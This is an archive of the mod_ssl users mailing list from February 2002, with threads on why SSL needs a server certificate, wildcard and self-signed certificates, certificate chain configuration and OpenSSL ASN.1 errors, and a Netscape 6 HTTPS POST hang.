owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Justin Greene X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1B370.3A355F90 Content-Type: text/plain; charset="iso-8859-1" So you spam to promote it. How annoying. Actually, the email address you saw is a Spamex Disposable Email Address and though it is plain text, this is the only place that it was used and I can turn it off and create a new one for this use at any time so it is not a vunerable as it appears. -----Original Message----- From: Jeff Graysmith [mailto:ec00067@cci-29palms.com] Sent: Monday, February 11, 2002 12:09 PM To: modssl-users@modssl.org Subject: MODSSL: You know your email is vulnerable to SPAM Robots? Hello, Please pardon the intrusion, but I saw that your email address modssl-users@modssl.org is in plain text on the site http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html making it vulnerable to be harvested by SPAM robots. There's a neat way to hide your email from robots, but have human users use it just like normal. http://63.241.136.161/ec10067/ Sincerely, Jeff Graysmith ------_=_NextPart_001_01C1B370.3A355F90 Content-Type: text/html; charset="iso-8859-1"
So you spam to promote it.  How annoying.  Actually, the email address you saw is a Spamex Disposable Email Address and though it is plain text, this is the only place that it was used and I can turn it off and create a new one for this use at any time so it is not a vunerable as it appears.
 
-----Original Message-----
From: Jeff Graysmith [mailto:ec00067@cci-29palms.com]
Sent: Monday, February 11, 2002 12:09 PM
To: modssl-users@modssl.org
Subject: MODSSL: You know your email is vulnerable to SPAM Robots?

Hello,

Please pardon the intrusion, but I saw that your email address modssl-users@modssl.org is in plain text on the site http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html making it vulnerable to be harvested by SPAM robots.

There's a neat way to hide your email from robots, but have human users use it just like normal.
http://63.241.136.161/ec10067/

Sincerely,
Jeff Graysmith
------_=_NextPart_001_01C1B370.3A355F90-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 07:11:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA07790; Tue, 12 Feb 2002 07:10:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id HAA07745; Tue, 12 Feb 2002 07:09:38 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B86F94CE718; Tue, 12 Feb 2002 07:09:37 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1C698P66686; Tue, 12 Feb 2002 07:09:08 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bilbo.in.mat.cc id WAA14167; Mon, 11 Feb 2002 22:14:03 +0100 (MET) Received: from bilbo.org (localhost [127.0.0.1]) by bilbo.in.mat.cc (Postfix) with ESMTP id 8817371055 for ; Mon, 11 Feb 2002 22:13:56 +0100 (CET) Received: from club-internet.fr (sauron.in.mat.cc [212.43.217.122]) by bilbo.in.mat.cc (Postfix) with ESMTP id C659271055 for ; Mon, 11 Feb 2002 22:13:53 +0100 (CET) Message-ID: <3C683411.60F47770@club-internet.fr> Date: Mon, 11 Feb 2002 22:13:53 +0100 From: Mathieu Arnold Organization: http://www.absolight.fr/ X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: https without certificate References: <20020210181534.A15497@engelschall.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mathieu Arnold X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Ralf S. Engelschall" wrote: > > In article <3C641CF3.54853C55@club-internet.fr> you wrote: > > > I was wondering if it may be possible to configure modssl to do crypto > > with no certificate. > > No. too bad > > I know that it should be possible because certificates are just a way to > > authenticate the server, not to establish the crypto. > > No, the server certificate is also important and required for the secure > exchange of the crytography parameters of SSL/TLS. Without this, the > client and server would not be able to securely exchange the necessary > symmetric encryption parameters. well, that's right, but, if I don't really care about that much security and would just like some crippled http to get rid of young kiddies ? -- Mathieu Arnold ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 09:12:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA12824; Tue, 12 Feb 2002 09:11:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA12810; Tue, 12 Feb 2002 09:10:39 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA17683 for ; Tue, 12 Feb 2002 09:10:33 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma017621; Tue, 12 Feb 02 09:10:26 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA04492 for ; Tue, 12 Feb 2002 09:10:26 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA06027 for ; Tue, 12 Feb 2002 09:10:24 +0100 (MET) Message-ID: <3C68CDF0.FBFC68AF@bourse.ch> Date: Tue, 12 Feb 2002 09:10:24 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: https without certificate References: <20020210181534.A15497@engelschall.com> <3C683411.60F47770@club-internet.fr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mathieu Arnold wrote: > > > I know that it should be possible because certificates are just a way to > > > authenticate the server, not to establish the crypto. > > > > No, the server certificate is also important and required for the secure > > exchange of the crytography parameters of SSL/TLS. Without this, the > > client and server would not be able to securely exchange the necessary > > symmetric encryption parameters. > > well, that's right, but, if I don't really care about that much security > and would just like some crippled http to get rid of young kiddies ? Read Ralf's reply again - the certificate actually *contains* the server's public key. The browser uses this to encrypt a session-key and send this back to the server. Thereafter, the browser and server use this common session key to communicate throughout the rest of the session. Without a certificate, the browser can *never* establish communication with the server. It's like opening a locked door without a key. Read some of the docs for more details. If you don't care about authentication (or rather, if you believe your clients don't care about authentication) then make a self-signed certificate as described in the mod_ssl docs (see the website). This will provide the free certificate you need to get SSL working. Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 13:34:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA27353; Tue, 12 Feb 2002 13:33:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id NAA27329; Tue, 12 Feb 2002 13:32:23 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g1CCViv06915 for ; Tue, 12 Feb 2002 12:32:05 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id <1X2QXM6L>; Tue, 12 Feb 2002 12:34:05 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066D6A@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Multople VH with same certificate? Date: Tue, 12 Feb 2002 12:34:22 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >-----Original Message----- >From: Owen Boyle [mailto:obo@bourse.ch] >Sent: 11 February 2002 16:26 >To: modssl-users@modssl.org >Subject: Re: Multople VH with same certificate? > > >Santosh Deshpande wrote: >> >> hi all, >> I would like to know whether a SSL certificate is issued >to a specific >> domain? > >Yes - a normal certificate has the fully-qualified domain name >in it. If >you use the cert on another site, the browser will trap it and >pop up an >alert that the cert doesn't match the FQDN. > >> Can I run have two vhosts configured with a single certificate >> e.g. www.mydomain.com ( 213.x.x.x:443) >> and sub.mydomain.com ( 213.x.x.y:443) > >SSL doesn't care about the IP addresses. If you run two sites like this >with one cert, it will "work" - but the browser will throw up an alert >which might frighten off customers. > >I've heard you can get a wildcard certificate which will match >*.mydomain.com - from Thwate, I think. > Here at RNIB we've been using a wildcard certificate from Thawte (www.thawte.com, pronounced "thought") since July 1999, mainly because of the hassle of maintaining several certificates. . Recently, it simply been more economical to pay $500 for a wildcard certificate than for several $100 certificates (the price may have changed since our last renewal). In all that time I've not received any complaints that someone couldn't connect to our secure site. We've had 128bit security since 1997, again without much difficulty. A while ago we had some problems internally with IE and SSL. IIRC that was with IE5.0 and no service packs. We currently use IE5.5SP2 corporately (yuk!) again without SSL related problems. Of course, YMMV. In an event, you'll find Thawte staff very helpful. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Agnostic (Greek) = Ignoramus (Latin) - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 14:56:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA00371; Tue, 12 Feb 2002 14:55:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id OAA00361; Tue, 12 Feb 2002 14:54:54 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA08047; Tue, 12 Feb 2002 09:00:48 -0500 Date: Tue, 12 Feb 2002 09:00:48 -0500 (EST) From: "R. DuFresne" To: Mathieu Arnold cc: modssl-users@modssl.org Subject: Re: https without certificate In-Reply-To: <3C683411.60F47770@club-internet.fr> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Mon, 11 Feb 2002, Mathieu Arnold wrote: > "Ralf S. Engelschall" wrote: > > > > In article <3C641CF3.54853C55@club-internet.fr> you wrote: > > > > > I was wondering if it may be possible to configure modssl to do crypto > > > with no certificate. > > > > No. > > too bad > > > > I know that it should be possible because certificates are just a way to > > > authenticate the server, not to establish the crypto. > > > > No, the server certificate is also important and required for the secure > > exchange of the crytography parameters of SSL/TLS. Without this, the > > client and server would not be able to securely exchange the necessary > > symmetric encryption parameters. > > well, that's right, but, if I don't really care about that much security > and would just like some crippled http to get rid of young kiddies ? > > Well ya could always banner-up: Warning, no one underage allowed! Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 15:26:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA01893; Tue, 12 Feb 2002 15:25:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.internet.gr id PAA01876; Tue, 12 Feb 2002 15:24:35 +0100 (MET) Received: from null ([62.1.0.62]) by mail1.internet.gr (iPlanet Messaging Server 5.1 (built May 7 2001)) with SMTP id <0GRF0097IC0SGN@mail1.internet.gr> for modssl-users@modssl.org; Tue, 12 Feb 2002 16:24:28 +0200 (EET) Date: Tue, 12 Feb 2002 16:29:53 +0200 From: Pantelis Roditis Subject: "Common" Error? To: modssl-users@modssl.org Message-id: MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-7 Content-transfer-encoding: 7BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pantelis Roditis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, i just installed my certificate but i am unable to start apache (1.3.22). The error is this [Tue Feb 12 16:15:28 2002] [error] OpenSSL: error:0D09F007:asn1 encoding routines:d2i_X509:expecting an asn1 sequence After a small search on the web i found out that this error is very common but i wasn't able to find an answer on it. Can someone please give me a hint? Thanx in advance Kind Regards Pantelis Roditis ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 15:44:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA02539; Tue, 12 Feb 2002 15:43:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mr0.wpafb.af.mil id PAA02527; Tue, 12 Feb 2002 15:42:53 +0100 (MET) Received: from mvs0.wpafb.af.mil (mvs0.wpafb.af.mil [198.97.67.121]) by mr0.wpafb.af.mil (8.11.6/8.11.6) with ESMTP id g1CEgqf00014 for ; Tue, 12 Feb 2002 09:42:52 -0500 (EST) Received: from mvs0.wpafb.af.mil (localhost [127.0.0.1]) by mvs0.wpafb.af.mil (8.11.6/8.11.6) with ESMTP id g1CEgpR22057 for ; Tue, 12 Feb 2002 09:42:51 -0500 (EST) Received: from fszhtv02.wpafb.af.mil (fszhtv02.wpafb.af.mil [129.48.28.35]) by mvs0.wpafb.af.mil (8.11.6/8.11.6) with ESMTP id g1CEgpC22049 for ; Tue, 12 Feb 2002 09:42:51 -0500 (EST) Received: by fszhtv02.wpafb.af.mil with Internet Mail Service (5.5.2653.19) id <1XPTSPDN>; Tue, 12 Feb 2002 09:43:06 -0500 Message-ID: <0122CEB9EA43D511B46B00508BE3BDD20B1C76@fszhtv13.wpafb.af.mil> From: Clista Robert T Contr Det 1 AFRL/WSI To: "'modssl-users@modssl.org'" Subject: Certificate Installation Date: Tue, 12 Feb 2002 09:43:08 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Clista Robert T Contr Det 1 AFRL/WSI X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Pardon my posting these questions, but I did not see this addressed in any FAQs or HOWtos. I am having difficulty installing my CA signed certificates. I am not sure if the problem lies with the certificate itself or the root and chain certificates that also need to be installed. If it is the root and chain certificates then I need advice on combining these files ( I have 2 roots and 5 chains) or referencing all these files in the "httpd.conf" file. The errors I receive in the SSL engine log are as follows: [07/Feb/2002 16:34:41 15385] [error] Init: (rwsidb002:443) Unable to configure v erify locations for client authentication (OpenSSL library error follows) [07/Feb/2002 16:34:41 15385] [error] OpenSSL: error:0D0A2007:asn1 encoding routi nes:d2i_X509_CINF:expecting an asn1 sequence [07/Feb/2002 16:34:41 15385] [error] OpenSSL: error:0D09F004:asn1 encoding routi nes:d2i_X509:nested asn1 error [07/Feb/2002 16:34:41 15385] [error] OpenSSL: error:0907400D:PEM routines:PEM_X5 09_INFO_read_bio:ASN1 lib [07/Feb/2002 16:34:41 15385] [error] OpenSSL: error:0B084009:x509 certificate ro utines:X509_load_cert_crl_file:missing asn1 eos The httpd daemon will not start when processing this certifcate. Is this the kind of problem seen if one is missing a chain certificate?? I have one of my root certificates installed but I'm not sure how to reference multiple chain files or multiple roots. For example, this section from the httpd.conf file reads: # Server Certificate Chain: # Point SSLCertificateChainFile at a file containing the # concatenation of PEM encoded CA certificates which form the # certificate chain for the server certificate. Alternatively # the referenced file can be the same as SSLCertificateFile # when the CA certificates are directly appended to the server # certificate for convinience. #SSLCertificateChainFile /u001/oracle/ui9ias/Apache/Apache/conf/ssl.crt/rootcace rt.crt It seems to imply only one certificate chain file can be referenced. If more than one chain files exists, they should be concatenated. If that is correct, what is the correct procedure for concatenation? Do you merely cut and paste all the chains together leaving intact the begin and end certificate header and tails for each file? Robert Clista Wright Research Site/Northrop Grumman Tel: (937) 255-4423 Fax: (937) 656-4308 Robert.Clista@wpafb.af.mil ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 17:15:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA07896; Tue, 12 Feb 2002 17:14:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop6.sttl.uswest.net id RAA07868; Tue, 12 Feb 2002 17:13:30 +0100 (MET) Received: (qmail 10777 invoked by uid 0); 12 Feb 2002 16:13:24 -0000 Received: from sttldslgw34poolb109.sttl.uswest.net (HELO wmtiabertj) (65.102.185.109) by sttlpop6.sttl.uswest.net with SMTP; 12 Feb 2002 16:13:24 -0000 Date: Tue, 12 Feb 2002 08:16:27 -0800 Message-ID: From: "SoilentG" To: modssl-users@modssl.org Subject: RE: https without certificate MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <3C68CDF0.FBFC68AF@bourse.ch> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Read Ralf's reply again - the certificate actually *contains* the > server's public key. The browser uses this to encrypt a session-key and > send this back to the server. Thereafter, the browser and server use > this common session key to communicate throughout the rest of the > session. > > Without a certificate, the browser can *never* establish communication > with the server. It's like opening a locked door without a key. Read > some of the docs for more details. > > If you don't care about authentication (or rather, if you believe your > clients don't care about authentication) then make a self-signed > certificate as described in the mod_ssl docs (see the website). This > will provide the free certificate you need to get SSL working. > > Rgds, > > Owen Boyle. When I first started messing with SSL I too had wanted this but found it not possible. However, if you do a self-signed certificate then you have to send the public certificate to the users so they don't get that annoying pop-up. Otherwise you'll have to cough up some dough for a signed cert from a true authority. Sadly, in our wonderfully free Linux world, you hit a brick wall where you either have to 1) live with an annoying feature, 2) use a clumsy workaround or 3) pay, pay, pay. Jeff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 18:19:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA12098; Tue, 12 Feb 2002 18:18:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id SAA12084; Tue, 12 Feb 2002 18:17:51 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16agYr-0001aL-00 for modssl-users@modssl.org; Tue, 12 Feb 2002 18:17:45 +0100 To: modssl-users@modssl.org Subject: VerifyClient browsers Message-ID: <1013534265.3c694e3987e05@webmail.regiocom.net> Date: Tue, 12 Feb 2002 18:17:45 +0100 (CET) From: NickM MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users When reading about SSLVerifyClient http://modssl.com/docs/2.8/ssl_reference.html#ToC17 At the bottom it mentions that the "optional" choice doesnt work in all browsers, is there any info which. Im trying to have certificates from the client as an alternative to basic auth but fall back on basic auth if none is sent, I assume this is the only way to go about that. Thanks, Nick ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 12 21:55:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA21799; Tue, 12 Feb 2002 21:54:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.sahost.com id VAA21780; Tue, 12 Feb 2002 21:53:52 +0100 (MET) Received: (qmail 16763 invoked from network); 12 Feb 2002 21:00:58 -0000 Received: from unknown (HELO most.com.ar) (192.168.1.2) by mail.sahost.com with SMTP; 12 Feb 2002 21:00:58 -0000 Message-ID: <3C69841A.810428A8@most.com.ar> Date: Tue, 12 Feb 2002 18:07:38 -0300 From: Cesar Otero Souto X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.4.2-2 i686) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Lynx works but netscape and IE not Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cesar Otero Souto X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I got this when I trying to access from my graphical brouser [12/Feb/2002 12:55:52 20707] [info] Seeding PRNG with 0 bytes of entropy [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Handshake: start [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: before/accept initialization [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: SSLv3 read client hello A [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: SSLv3 write server hello A [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: SSLv3 write certificate A [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: SSLv3 write server done A [12/Feb/2002 12:55:52 20707] [trace] OpenSSL: Loop: SSLv3 flush data What do you think? -- Cesar Otero Souto DBA/Internet ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 14:04:02 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA05091; Wed, 13 Feb 2002 14:03:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1.internet.gr id OAA04998; Wed, 13 Feb 2002 14:02:31 +0100 (MET) Received: from null ([62.1.0.62]) by mail1.internet.gr (iPlanet Messaging Server 5.1 (built May 7 2001)) with SMTP id <0GRH004OB1D8B0@mail1.internet.gr> for modssl-users@modssl.org; Wed, 13 Feb 2002 14:29:37 +0200 (EET) Date: Wed, 13 Feb 2002 14:35:00 +0200 From: Pantelis Roditis Subject: RE: [Fwd: "Common" Error?] In-reply-to: <3C693A15.2020706@georgetown.edu> To: "John W. Ott" Cc: Modssl-Users Message-id: MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Content-type: text/plain; charset=iso-8859-7 Content-transfer-encoding: 8BIT Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pantelis Roditis X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, i did that and i still get the same error... When i try openssl x509 -noout -in server.crt i still get this error. Could this be something wrong with my CA ? Please not that this is my third certificate with errors. Is there any way to debug my certificate and see whats going on? Thanx in advance Kind Regards Pantelis Roditis -----Original Message----- From: John W. Ott [mailto:jwo@georgetown.edu] Sent: Ôñßôç, 12 Öåâñïõáñßïõ 2002 5:52 ìì To: Pantelis Roditis Subject: [Fwd: "Common" Error?] I ran into this it was the format of the certificate request and key file that was wrong. Here is the correct way# Generate the server.key /usr/local/ssl/bin/openssl genrsa -rand /usr/local/ssl/.rnd -des3 -out server.key 1024 # Generate certificate request to send to CA server /usr/local/ssl/bin/openssl req -new -key server.key -out server.csr HTH later John -------- Original Message -------- Subject: "Common" Error? Date: Tue, 12 Feb 2002 16:29:53 +0200 From: Pantelis Roditis Reply-To: modssl-users@modssl.org To: modssl-users@modssl.org Hi, i just installed my certificate but i am unable to start apache (1.3.22). The error is this [Tue Feb 12 16:15:28 2002] [error] OpenSSL: error:0D09F007:asn1 encoding routines:d2i_X509:expecting an asn1 sequence After a small search on the web i found out that this error is very common but i wasn't able to find an answer on it. Can someone please give me a hint? Thanx in advance Kind Regards Pantelis Roditis ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 19:02:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA20237; Wed, 13 Feb 2002 19:01:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from warspite.cnchost.com id TAA20207; Wed, 13 Feb 2002 19:00:27 +0100 (MET) Received: from WGUARALDI2 ([4.17.140.34]) by warspite.cnchost.com id NAA07321; Wed, 13 Feb 2002 13:00:25 -0500 (EST) [ConcentricHost SMTP Relay 1.14] From: "Will Guaraldi" To: "mod_ssl" Subject: mod_ssl blocking on NS 6.1 HTTPS post Date: Wed, 13 Feb 2002 13:00:25 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Will Guaraldi" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We seem to be having a problem with Netscpae 6.1 and 6.2 when interacting with mod_ssl. We're running Apache 1.3.20 (Win32) ApacheJServ/1.1.2 mod_ssl/2.8.4 on a Windows 2000 Server. We're compiling it using VC++ 6.0. The problem manifests itself like this. We're doing an HTTPS post to a Java Servlet. In IE versions we've tested, everything goes along just fine. When using Netscape 6.1 or 6.2 (6.0 is fine), the HTTPS post hangs. I've been running Apache through the debugger and this is what I'm observing: I set Netscape 6.1 or 6.2 to do the HTTPS post request. mod_ssl cycles through SSL_recvwithtimeout in ssl_engine_io.c a few times. The first time it picks up half the HTTP headers, the second time it picks up the other half of the HTTP headers and a smidgeon of POST data. On the third cycle through that code, it reaches the following snippet at the very top of the SSL_recvwithtimeout function: if (!(tv.tv_sec = ap_check_alarm())) return (SSL_read(ssl, buf, len)); ap_check_alarm() is returning a 0 into tv.tv_sec. This causes the code to do the SSL_read, but it blocks on the read and never comes back unless I kill the browser process. When I use IE and go through the same procedure, the ap_check_alarm() call returns a variety of numbers all in the upper 200's--it never returns a 0. I've read through the mod_ssl archives and the Mozilla bugs and noticed that there was a point in the Mozilla builds where it was having problems with HTTP posts. I can't tell if that's related to this or not. I do know that if I use Mozilla .9.8 everything works fine. I have a few questions. Why does mod_ssl execute ap_check_alarm?--I read through the code, but I'm not seeing the 50' view of what's going on. And why would it return a 0, but only with Netscape 6.1 and 6.2? Any help is greatly appreciated-- /will wguaraldi@byallaccounts.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 13 19:12:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA20972; Wed, 13 Feb 2002 19:11:05 